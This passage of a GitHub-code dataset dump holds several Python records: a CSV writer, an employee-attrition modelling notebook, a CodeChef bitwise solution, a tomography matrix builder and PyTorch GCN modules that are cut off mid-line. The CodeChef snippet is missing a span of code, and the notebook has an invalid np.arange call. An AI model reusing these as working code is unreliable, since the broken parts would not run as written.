함)\n fieldnames = ['rank', 'ranker']\n csv_writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n # 필드 이름을 csv 파일 최상단에 작성\n csv_writer.writeheader()\n # 리스트를 순회하며 key(csv의 필드)를 통해 value(내용)를 작성한다.ㄴ\n for item in result_list:\n csv_writer.writerow(item)","repo_name":"jung9156/studies","sub_path":"lecture/python/python_csv/daum_ranking.py","file_name":"daum_ranking.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72177150759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Background\n\n\n# In[ ]:\n\n\n#McCurr Health Consultancy is an MNC that has thousands of employees spread across the globe. \n#The company believes in hiring the best talent available and retaining them for as long as possible. \n#A huge amount of resources is spent on retaining existing employees through various initiatives. \n#The Head of People Operations wants to bring down the cost of retaining employees. For this, he proposes \n#limiting the incentives to only those employees who are at risk of attrition. As a recently hired Data \n#Scientist in the People Operations Department, you have been asked to identify patterns in characteristics \n#of employees who leave the organization. Also, you have to use this information to predict if an employee \n#is at risk of attrition. This information will be used to target them with incentives.\n\n\n# In[5]:\n\n\n#Objective\n\n\n# In[ ]:\n\n\n#To identify the different factors that drive attrition\n#To build a model to predict if an employee will attrite or not\n\n\n# In[3]:\n\n\n#Dataset Description\n\n\n# In[4]:\n\n\n#The data contains information on employees' demographic details, work-related metrics, and attrition flag.\n\n#EmployeeNumber - Unique Employee Identifier\n#Attrition - Did the employee attrite or not?\n#Age - Age of the employee\n#BusinessTravel - Travel commitments for the job\n#DailyRate - Data description not available\n#Department - Employee's Department\n#DistanceFromHome - Distance from work to home (in KM)\n#Education - Employee's Education. 1-Below College, 2-College, 3-Bachelor, 4-Master, 5-Doctor\n#EducationField - Field of Education\n#EnvironmentSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#Gender - Employee's gender\n#HourlyRate - Data description not available\n#JobInvolvement - 1-Low, 2-Medium, 3-High, 4-Very High\n#JobLevel - Level of job (1 to 5)\n#JobRole - Job Roles\n#JobSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#MaritalStatus - Marital Status\n#MonthlyIncome - Monthly Salary\n#MonthlyRate - Data description not available\n#NumCompaniesWorked - Number of companies worked at\n#Over18 - Whether the employee is over 18 years of age?\n#OverTime - Whether the employee is doing overtime?\n#PercentSalaryHike - The percentage increase in the salary last year\n#PerformanceRating - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#RelationshipSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#StandardHours - Standard Hours\n#StockOptionLevel - Stock Option Level\n#TotalWorkingYears - Total years worked\n#TrainingTimesLastYear - Number of training attended last year\n#WorkLifeBalance - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#YearsAtCompany - Years at Company\n#YearsInCurrentRole - Years in the current role\n#YearsSinceLastPromotion - Years since the last promotion\n#YearsWithCurrManager - Years with the current manager\n#In the real world, you will not find definitions for some of your variables. \n#It is the part of the analysis to figure out what they might mean.\n\n#Note\n#Kindly do not run the code cells containing Hyperparameter Tuning using GridSearchCV during the session, \n#since they take considerable time to run.\n\n\n# In[2]:\n\n\n#Importing the libraries and overview of the dataset\n\n\n# In[6]:\n\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\n\n# To scale the data using z-score\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.model_selection import train_test_split\n\n# Algorithms to use\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Metrics to evaluate the model\nfrom sklearn import metrics\n\nfrom sklearn.metrics import confusion_matrix, classification_report, precision_recall_curve,recall_score\n\nfrom sklearn import tree\n\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.ensemble import BaggingClassifier\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n# For tuning the model\nfrom sklearn.model_selection import GridSearchCV\n\n# To ignore warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[7]:\n\n\n#Loading the Dataset\n\n\n# In[8]:\n\n\n# Loading the dataset\ndf = pd.read_excel('/Users/yutaoyan/Desktop/HRemployeeGL/HREmployee.xlsx')\n\n\n# In[9]:\n\n\n# Looking at the first 5 records\ndf.head()\n\n\n# In[10]:\n\n\n#Checking the info of the dataset\n\n\n# In[11]:\n\n\n# Let us see the info of the data\ndf.info()\n\n\n# In[12]:\n\n\n#Observations:\n\n#There are 2940 observations and 34 columns in the dataset.\n#All the columns have 2940 non-null values, i.e., there are no missing values in the data.\n\n\n# In[13]:\n\n\n#Let's check the unique values in each column\n\n\n# In[14]:\n\n\n# Checking the count of unique values in each column\ndf.nunique()\n\n\n# In[15]:\n\n\n#Observations:\n\n#Employee number is an identifier which is unique for each employee and we can drop this column as \n#it would not add any value to our analysis.\n#Over18 and StandardHours have only 1 unique value. These columns will not add any value to our model \n#hence we can drop them.\n#Over18 and StandardHours have only 1 unique value. We can drop these columns as they will not add any \n#value to our analysis.\n#On the basis of number of unique values in each column and the data description, we can identify the \n#continuous and categorical columns in the data.\n\n\n#Let's drop the columns mentioned above and define lists for numerical and categorical columns to \n#explore them separately.\n\n\n# In[16]:\n\n\n# Dropping the columns\ndf = df.drop(['EmployeeNumber', 'Over18', 'StandardHours'] , axis = 1)\n\n\n# In[17]:\n\n\n# Creating numerical columns\nnum_cols = ['DailyRate', 'Age', 'DistanceFromHome', 'MonthlyIncome', 'MonthlyRate', 'PercentSalaryHike', 'TotalWorkingYears', \n 'YearsAtCompany', 'NumCompaniesWorked', 'HourlyRate', 'YearsInCurrentRole', 'YearsSinceLastPromotion', \n 'YearsWithCurrManager', 'TrainingTimesLastYear']\n\n# Creating categorical variables\ncat_cols = ['Attrition', 'OverTime', 'BusinessTravel', 'Department', 'Education', 'EducationField', 'JobSatisfaction', 'EnvironmentSatisfaction', \n 'WorkLifeBalance', 'StockOptionLevel', 'Gender', 'PerformanceRating', 'JobInvolvement', 'JobLevel', 'JobRole', 'MaritalStatus', 'RelationshipSatisfaction']\n\n\n# In[56]:\n\n\ndf2 = df.groupby('Attrition').median()\n\n\n# In[57]:\n\n\ndf2[num_cols].style.highlight_max(color=\"lightgreen\")\n\n\n# In[59]:\n\n\ndf = df.drop(['PercentSalaryHike', 'YearsSinceLastPromotion','PerformanceRating', 'HourlyRate'], axis=1)\n\n\n# In[18]:\n\n\n#univariate analysis and data preprocessing and move to the model building section.\n\n\n# In[19]:\n\n\n#Univariate analysis of numerical columns\n\n\n# In[20]:\n\n\n# Checking summary statistics\ndf[num_cols].describe().T\n\n\n# In[21]:\n\n\n#Observations:\n\n#Average employee age is around 37 years. It has a high range, from 18 years to 60, indicating good age \n#diversity in the organization.\n#At least 50% of the employees live within a 7 KM radius of the organization. However, there are some \n#extreme values, given that the maximum value is 29 km.\n#The average monthly income of an employee is USD 6500. It has a high range of values from 1K-20K USD, \n#which is to be expected for any organization's income distribution. There is a big difference between\n#the 3rd quartile value (around USD 8400) and the maximum value (nearly USD 20000), showing that the \n#company's highest earners have a disproportionately large income in comparison to the rest of the \n#employees. Again, this is fairly common in most organizations.\n#The average salary hike of an employee is around 15%. At least 50% of employees got a salary hike of\n#14% or less, with the maximum salary hike being 25%.\n#The average number of years an employee is associated with the company is 7.\n#On average, the number of years since an employee got a promotion is ~2.19. The majority of employees\n#have been promoted since the last year.\n\n\n# In[22]:\n\n\n# Creating histograms\ndf[num_cols].hist(figsize = (14, 14))\n\nplt.show()\n\n\n# In[23]:\n\n\n#Observations:\n\n#The age distribution is close to a normal distribution, with the majority of employees between the ages\n#of 25 and 50.\n#DistanceFromHome also has a right-skewed distribution, meaning most employees live close to work but there \n#are a few that live further away.\n#MonthlyIncome and TotalWorkingYears are skewed to the right, indicating that the majority of workers are in \n#entry / mid-level positions in the organization.\n#The percentage salary hike is skewed to the right, which means employees are mostly getting lower percentage \n#salary increaseS.\n#The YearsAtCompany variable distribution shows a good proportion of workers with 10+ years, indicating a \n#significant number of loyal employees at the organization.\n#The YearsInCurrentRole distribution has three peaks at 0, 2, and 7. There are a few employees that have even \n#stayed in the same role for 15 years and more.\n#The YearsSinceLastPromotion variable distribution indicates that some employees have not received a promotion\n#in 10-15 years and are still working in the organization. These employees are assumed to be high work-experience \n#employees in upper-management roles, such as co-founders, C-suite employees, etc.\n#The distributions of DailyRate, HourlyRate, and MonthlyRate appear to be uniform and do not provide much \n#information. It could be that the daily rate refers to the income earned per extra day worked while the hourly\n#rate could refer to the same concept applied for extra hours worked per day. Since these rates tend to be \n#broadly similar for multiple employees in the same department, that explains the uniform distribution they show.\n\n\n# In[24]:\n\n\n#Univariate analysis for categorical variables\n\n\n# In[25]:\n\n\n# Printing the % sub categories of each category.\nfor i in cat_cols:\n \n print(df[i].value_counts(normalize = True))\n \n print('*' * 40)\n\n\n# In[26]:\n\n\n#Observations:\n#The employee attrition rate is ~16%.\n#Around 28% of the employees are working overtime. This number appears to be on the higher side and might\n#indicate a stressed employee work-life.\n#71% of the employees have traveled rarely, while around 19% have to travel frequently.\n#Around 73% of the employees come from an educational background in the Life Sciences and Medical fields.\n#Over 65% of employees work in the Research & Development department of the organization.\n#Nearly 40% of the employees have low (1) or medium-low (2) job satisfaction and environment satisfaction \n#in the organization, indicating that the morale of the company appears to be somewhat low.\n#Over 30% of the employees show low (1) to medium-low (2) job involvement.\n#Over 80% of the employees either have none or very few stock options.\n#In terms of performance ratings, none of the employees have rated lower than 3 (excellent).\n#About 85% of employees have a performance rating equal to 3 (excellent), while the remaining have a \n#rating of 4 (outstanding). This could either mean that the majority of employees are top performers, \n#or the more likely scenario is that the organization could be highly lenient with its performance appraisal \n#process.\n\n\n# In[27]:\n\n\n#Model Building - Approach\n#Data preparation.\n#Partition the data into a train and test set.\n#Build a model on the train data.\n#Tune the model if required.\n#Test the data on the test set.\n\n\n# In[28]:\n\n\n#Data preparation\n\n\n# In[29]:\n\n\n#Creating dummy variables for the categorical variables\n\n\n# In[30]:\n\n\n# Creating a list of columns for which we will create dummy variables\nto_get_dummies_for = ['BusinessTravel', 'Department', 'EducationField', 'Gender', 'MaritalStatus', 'JobRole']\n\n# Creating dummy variables\ndf = pd.get_dummies(data = df, columns = to_get_dummies_for, drop_first = True) \n\n# Mapping overtime and attrition\ndict_OverTime = {'Yes': 1, 'No': 0}\ndict_attrition = {'Yes': 1, 'No': 0}\n\ndf['OverTime'] = df.OverTime.map(dict_OverTime)\ndf['Attrition'] = df.Attrition.map(dict_attrition)\n\n\n# In[ ]:\n\n\n#Separating the independent variables (X) and the dependent variable (Y)\n\n\n# In[31]:\n\n\n# Separating the target variable and other variables\n\nY = df.Attrition\n\nX = df.drop(['Attrition'], axis = 1)\n\n\n# In[32]:\n\n\n#Splitting the data into 70% train and 30% test set\n\n\n# In[33]:\n\n\n# Splitting the data\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.3, random_state = 1, stratify = Y)\n\n\n# In[34]:\n\n\n# Creating metric function\n\ndef metrics_score(actual, predicted):\n \n print(classification_report(actual, predicted))\n \n cm = confusion_matrix(actual, predicted)\n \n plt.figure(figsize = (8, 5))\n \n sns.heatmap(cm, annot = True, fmt = '.2f', xticklabels = ['Not Attriate', 'Attriate'], yticklabels = ['Not Attriate', 'Attriate'])\n \n plt.ylabel('Actual')\n \n plt.xlabel('Predicted')\n \n plt.show()\n\n\n# In[35]:\n\n\n# Building decision tree model\ndt = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n\n# In[36]:\n\n\n# Fitting decision tree model\ndt.fit(x_train, y_train)\n\n\n# In[37]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dt.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[38]:\n\n\n#Observation:\n\n#The Decision tree is giving a 100% score for all metrics on the training dataset.\n\n\n# In[39]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dt.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[60]:\n\n\nnp.round(dt.feature_importances_, 4)\n\n\n# In[40]:\n\n\n# Plot the feature importance\n\nimportances = dt.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance,importance_df.index)\n\n\n# In[41]:\n\n\n# Choose the type of classifier\ndtree_estimator = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n# Grid of parameters to choose from\nparameters = {'max_depth': np.arange(4,5,6,7), \n 'criterion': ['gini', 'entropy'],\n 'min_samples_leaf': [5, 10, 20, 25]\n }\n\n# Type of scoring used to compare parameter combinations\nscorer = metrics.make_scorer(recall_score, pos_label = 1)\n\n# Run the grid search\ngridCV = GridSearchCV(dtree_estimator, parameters, scoring = scorer, cv = 10)\n\n# Fitting the grid search on the train data\ngridCV = gridCV.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\ndtree_estimator = gridCV.best_estimator_\n\n# Fit the best estimator to the data\ndtree_estimator.fit(x_train, y_train)\n\n\n# In[61]:\n\n\ngridCV.best_params_\n\n\n# In[42]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dtree_estimator.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[43]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dtree_estimator.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[44]:\n\n\nimportances = dtree_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[45]:\n\n\nfeatures = list(X.columns)\n\nplt.figure(figsize = (30, 20))\n\ntree.plot_tree(dt, max_depth = 4, feature_names = features, filled = True, fontsize = 12, node_ids = True, class_names = True)\n\nplt.show()\n\n\n# #Fitting the Random Forest classifier on the training data\n# rf_estimator = RandomForestClassifier(n_estimators=500, class_weight = \"balanced\", random_state = 1, max_depth=2)\n# \n# rf_estimator.fit(x_train, y_train)\n\n# In[64]:\n\n\n# Fitting the Random Forest classifier on the training data\nrf_estimator = RandomForestClassifier(n_estimators=500, class_weight = \"balanced\", random_state = 1, max_depth=2)\nrf_estimator.fit(x_train, y_train)\n\n\n# In[47]:\n\n\n# Checking performance on the training data\ny_pred_train_rf = rf_estimator.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf)\n\n\n# In[48]:\n\n\n# Checking performance on the testing data\ny_pred_test_rf = rf_estimator.predict(x_test)\n\nmetrics_score(y_test, y_pred_test_rf)\n\n\n# In[49]:\n\n\nimportances = rf_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[69]:\n\n\n# Choose the type of classifier\nrf_estimator_tuned = RandomForestClassifier(class_weight =\"balanced\", random_state = 1)\n\n# Grid of parameters to choose from\nparams_rf = { \"max_depth\": [2,3,4,5,6],\n \"n_estimators\": [100, 250, 500],\n \"min_samples_leaf\": np.arange(1, 4, 1),\n \"max_features\": ['log2', 'auto'],\n}\n\n\n# Type of scoring used to compare parameter combinations - recall score for class 1\nscorer = \"recall\"\n\n# Run the grid search\ngrid_obj = GridSearchCV(rf_estimator_tuned, params_rf, scoring = \"recall\", cv = 3, n_jobs=-1)\n\ngrid_obj2 = grid_obj.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\nrf_estimator_tuned = grid_obj2.best_estimator_\n\n\n# In[66]:\n\n\nrf_estimator_tuned.fit(x_train, y_train)\n\n\n# In[67]:\n\n\n# Checking performance on the training data\ny_pred_train_rf_tuned = rf_estimator_tuned.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf_tuned)\n\n\n# In[68]:\n\n\n# Plotting feature importance\nimportances = rf_estimator_tuned.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Hangzhouer22/machine-learning","sub_path":"machine learning employee attrition.py","file_name":"machine learning employee attrition.py","file_ext":"py","file_size_in_byte":17878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34357820830","text":"import random\ndef bruteForce(x,y,l,r):\n maxVal = -1\n zMax = 0\n for num in range(l, r+1):\n temp = F(x,y,num)\n if temp > maxVal:\n maxVal = temp\n zMax = num\n return zMax\nclass Bit:\n def setBit(self, num, pos):\n return num|(1<0:\n pos-=1\n currMax = float(\"-inf\")\n z = 0\n possibleValues = [l,r]\n for posForZ1 in range(pos-1, -1, -1):\n if bitObj.getBit(l, posForZ1):\n continue\n z1 = bitObj.setBit(l, posForZ1)\n for rest in range(posForZ1-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z1 = bitObj.setBit(z1, rest)\n else:\n z1 = bitObj.unsetBit(z1, rest)\n possibleValues.append(z1)\n for posForZ2 in range(pos-1, -1, -1):\n if not bitObj.getBit(r, posForZ2):\n continue\n z2 = bitObj.unsetBit(r, posForZ2)#unsetting the bit to make it less than r\n for rest in range(posForZ2-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z2 = bitObj.setBit(z2, rest)\n else:\n z2 = bitObj.unsetBit(z2, rest)\n possibleValues.append(z2)\n possibleValues.sort()\n for num in possibleValues:\n value = F(x,y, num)\n if value > currMax:\n z = num\n currMax = value\n # if z!= bruteForce(x,y,l,r):\n print(z)\n # break\n\n#\n#\n","repo_name":"subho2107/Codechef","sub_path":"May long challenge/chef and bitwise product.py","file_name":"chef and bitwise product.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"12626981494","text":"def paralleltomo(*args):\r\n#PARALLELTOMO Creates a 2D tomography system matrix using parallel beams\r\n#\r\n# [A,theta,p,d] = paralleltomo(N)\r\n# [A,theta,p,d] = paralleltomo(N,theta)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p,d)\r\n#\r\n# This function creates a 2D tomography test problem with an N-times-N\r\n# domain, using p parallel rays for each angle in the vector theta.\r\n#\r\n# Input: \r\n# N Scalar denoting the number of discretization intervals in \r\n# each dimesion, such that the domain consists of N^2 cells.\r\n# theta Vector containing the angles in degrees. Default: theta = \r\n# 0:1:179.\r\n# p Number of parallel rays for each angle. Default: p =\r\n# round(sqrt(2)*N).\r\n# d Scalar denoting the distance from the first ray to the last.\r\n# Default: d = sqrt(2)*N.\r\n#\r\n# Output:\r\n# A Coefficient matrix with N^2 columns and nA*p rows, \r\n# where nA is the number of angles, i.e., length(theta).\r\n# theta Vector containing the used angles in degrees.\r\n# p The number of used rays for each angle.\r\n# d The distance between the first and the last ray.\r\n# \r\n# See also: fanbeamtomo, seismictomo.\r\n\r\n#Anders Nymark Christensen, 20180216, DTU Compute\r\n#Revised from the matlab version by:\r\n \r\n# Jakob Sauer Jørgensen, Maria Saxild-Hansen and Per Christian Hansen,\r\n# October 1, 201r, DTU Compute.\r\n\r\n# Reference: A. C. Kak and M. Slaney, Principles of Computerized \r\n# Tomographic Imaging, SIAM, Philadelphia, 2001.\r\n \r\n\r\n import numpy as np\r\n from scipy.sparse import csr_matrix\r\n \r\n N = args[0]\r\n\r\n \r\n # Default value of d.\r\n if len(args) < 4:\r\n d = np.sqrt(2)*N\r\n else:\r\n d = args[3]\r\n \r\n # Default value of the number of rays.\r\n if len(args) < 3:\r\n p = int(round(np.sqrt(2)*N))\r\n else:\r\n p = args[2]\r\n\r\n # Default value of the angles theta.\r\n if len(args) < 2:\r\n theta = np.matrix(np.arange(0.,180.))\r\n else:\r\n theta = args[1]\r\n\r\n\r\n # Define the number of angles.\r\n nA = theta.shape[1]\r\n\r\n # The starting values both the x and the y coordinates. \r\n x0 = np.matrix(np.linspace(-d/2,d/2,p)).T\r\n y0 = np.matrix(np.zeros([p,1]))\r\n\r\n # The intersection lines.\r\n x = np.matrix(np.arange(-N/2,N/2 + 1)).T\r\n y = np.copy(x)\r\n\r\n # Initialize vectors that contains the row numbers, the column numbers and\r\n # the values for creating the matrix A effiecently.\r\n rows = np.matrix(np.zeros([2*N*nA*p,1]))\r\n cols = np.copy(rows)\r\n vals = np.copy(rows)\r\n idxend = 0\r\n\r\n\r\n # Loop over the chosen angles.\r\n for i in range(0,nA):\r\n \r\n # All the starting points for the current angle.\r\n x0theta = np.cos(np.deg2rad(theta[0,i]))*x0-np.sin(np.deg2rad(theta[0,i]))*y0\r\n y0theta = np.sin(np.deg2rad(theta[0,i]))*x0+np.cos(np.deg2rad(theta[0,i]))*y0\r\n \r\n # The direction vector for all the rays corresponding to the current \r\n # angle.\r\n a = -np.sin(np.deg2rad(theta[0,i]))\r\n b = np.cos(np.deg2rad(theta[0,i]))\r\n \r\n # Loop over the rays.\r\n for j in range(0,p):\r\n \r\n # Use the parametrisation of line to get the y-coordinates of\r\n # intersections with x = k, i.e. x constant.\r\n tx = (x - x0theta[j,0])/a\r\n yx = b*tx + y0theta[j,0]\r\n \r\n # Use the parametrisation of line to get the x-coordinates of\r\n # intersections with y = k, i.e. y constant.\r\n ty = (y - y0theta[j,0])/b\r\n xy = a*ty + x0theta[j,0] \r\n \r\n # Collect the intersection times and coordinates. \r\n t = np.vstack([tx, ty])\r\n xxy = np.vstack([x, xy])\r\n yxy = np.vstack([yx, y])\r\n \r\n # Sort the coordinates according to intersection time.\r\n I = np.argsort(t,0)\r\n xxy = xxy[I]\r\n yxy = yxy[I] \r\n \r\n # Skip the points outside the box.\r\n I1 = np.logical_and(np.array(xxy) >= -N/2 , np.array(xxy) <= N/2)\r\n I2 = np.logical_and(np.array(yxy) >= -N/2 , np.array(yxy) <= N/2)\r\n I = np.squeeze(np.logical_and(I1,I2))\r\n #I = (xxy >= -N/2 & xxy <= N/2 & yxy >= -N/2 & yxy <= N/2)\r\n xxy = np.squeeze(xxy[I])\r\n yxy = np.squeeze(yxy[I])\r\n \r\n # Skip double points.\r\n I = np.logical_and(abs(np.diff(xxy)) <= 1e-10 , abs(np.diff(yxy)) <= 1e-10)\r\n if np.not_equal(I.size, 0):\r\n I = np.concatenate((I, np.matrix([False])), axis=1)\r\n xxy = xxy[~I]\r\n yxy = yxy[~I]\r\n# xxy = np.delete(xxy,I)\r\n# yxy = np.delete(yxy,I)\r\n \r\n # Calculate the length within cell and determines the number of\r\n # cells which is hit.\r\n d = np.sqrt(np.power(np.diff(xxy),2) + np.power(np.diff(yxy),2))\r\n numvals = d.shape[1]\r\n \r\n # Store the values inside the box.\r\n if numvals > 0:\r\n \r\n # If the ray is on the boundary of the box in the top or to the\r\n # right the ray does not by definition lie with in a valid cell.\r\n if not ((b == 0 and abs(y0theta[j,0] - N/2) < 1e-15) or (a == 0 and abs(x0theta[j,0] - N/2) < 1e-15)):\r\n \r\n # Calculates the midpoints of the line within the cells.\r\n xm = 0.5*(xxy[0,0:-1]+xxy[0,1:]) + N/2\r\n ym = 0.5*(yxy[0,0:-1]+yxy[0,1:]) + N/2\r\n \r\n # Translate the midpoint coordinates to index.\r\n col = np.floor(xm)*N + (N - np.floor(ym)) - 1\r\n \r\n # Create the indices to store the values to vector for\r\n # later creation of A matrix.\r\n idxstart = idxend\r\n idxend = idxstart + numvals\r\n idx = np.arange(idxstart,idxend)\r\n \r\n # Store row numbers, column numbers and values. \r\n rows[idx,0] = i*p + j\r\n cols[idx,0] = col[0,:]\r\n vals[idx,0] = d \r\n\r\n\r\n # Truncate excess zeros.\r\n rows = rows[0:idxend]\r\n cols = cols[0:idxend]\r\n vals = vals[0:idxend]\r\n \r\n # Create sparse matrix A from the stored values.\r\n A = csr_matrix((vals[:,0].astype(np.float), (np.squeeze(np.array(rows[:,0]).astype(int)), np.squeeze(np.array(cols[:,0]).astype(int)))), dtype=np.float, shape=(p*nA, N**2)).toarray()\r\n\r\n \r\n return [A,theta,p,d]\r\n\r\nimport numpy as np\r\nN=8\r\ntheta = np.matrix([45.0000, 67.5000, 90.0000, 112.5000, 135.0000, 157.5000, 180.0000, 202.5000, 225.0000, 247.5000, 270.0000, 292.5000, 315.0000])\r\n[A,theta,p,d] = paralleltomo(N,theta,11)\r\n\r\nnp.linalg.matrix_rank(A)\r\n\r\nN=200\r\ntheta =np.matrix(np.linspace(0,179,179))\r\np = 250\r\n[A,theta,p,d] = paralleltomo(N,theta,p)\r\n","repo_name":"npeuker/MathModellingDTU","sub_path":"Exam Project/paralleltomo.py","file_name":"paralleltomo.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"39378918420","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport math\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef spec_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef spac_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -1.).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef normalize_adj_torch(mx):\n mx = mx.to_dense()\n rowsum = mx.sum(1)\n r_inv_sqrt = torch.pow(rowsum, -0.5).flatten()\n r_inv_sqrt[torch.isinf(r_inv_sqrt)] = 0.\n r_mat_inv_sqrt = torch.diag(r_inv_sqrt)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n mx = torch.transpose(mx, 0, 1)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n return mx\n\n\nclass MLP(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=bias)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, x):\n x_fts = self.fc(x)\n if self.bias is not None:\n x_fts += self.bias\n return self.act(x_fts)\n\n\nclass GCN_MI(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=False)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, A, x, sparse=False):\n x_fts = self.fc(x)\n if sparse:\n out = torch.unsqueeze(torch.spmm(A, torch.squeeze(x_fts, 0)), 0)\n else:\n out = torch.bmm(A.unsqueeze(0), x_fts.unsqueeze(0))\n if self.bias is not None:\n out += self.bias\n return self.act(out).squeeze(0)\n\n\nclass GCN(nn.Module):\n\n def __init__(self, in_dim, out_dim):\n super(GCN, self).__init__()\n self.proj = nn.Linear(in_dim, out_dim)\n self.drop = nn.Dropout(p=0.3)\n\n def forward(self, A, X, act=None):\n X = self.drop(X)\n X = torch.matmul(A, X)\n X = self.proj(X)\n if act is not None:\n X = act(X)\n return X\n\n\nclass Discriminator(nn.Module):\n def __init__(self, n_h):\n super().__init__()\n self.f_k = nn.Bilinear(n_h, n_h, 1)\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Bilinear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, c, h_pl, h_mi, s_bias1=None, s_bias2=None):\n c_x = c\n sc_1 = torch.squeeze(self.f_k(h_pl, c_x), -2)\n sc_2 = torch.squeeze(self.f_k(h_mi, c_x), -2)\n if s_bias1 is not None:\n sc_1 += s_bias1\n if s_bias2 is not 